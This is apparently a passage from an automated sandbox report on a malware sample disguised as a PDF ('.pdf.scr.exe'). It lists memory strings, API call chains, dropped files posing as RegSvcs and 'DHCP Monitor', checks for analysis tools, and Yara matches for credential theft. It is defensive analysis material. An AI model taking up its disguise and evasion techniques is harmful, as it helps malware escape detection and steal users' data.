      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitforinputidle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindowvisible
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dialogboxparamw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog*
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextws
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: senddlgitemmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfocus
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow{
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsyscolor
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadbitmapw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadiconw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroyicon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatiblebitmap
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deleteobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecaps
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapsw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: selectobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchblt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createdibsection
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00313312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0037EBB3 mouse_event,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00371EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_003713F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007382000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003872000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerH
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager&
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.586667731.00000000075DC000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
      Source: itugx.exe | Binary or memory string: Shell_TrayWnd
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager8W
      Source: itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerm,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managera
      Source: itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inGetText("Program Manager") = "0" Then
      Source: rnnsh.xls.0.dr | Binary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager\2
      Source: itugx.exe, 00000017.00000003.535781769.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534401259.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.539266088.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager*;
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then$
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003802000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerD$Fp
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: GetLocaleInfoW,GetNumberFormatW,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CDF654 cpuid
      Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0034BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0036E5F8 GetUserNameW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCB146 GetVersionExW,
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

      Stealing of Sensitive Information

      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
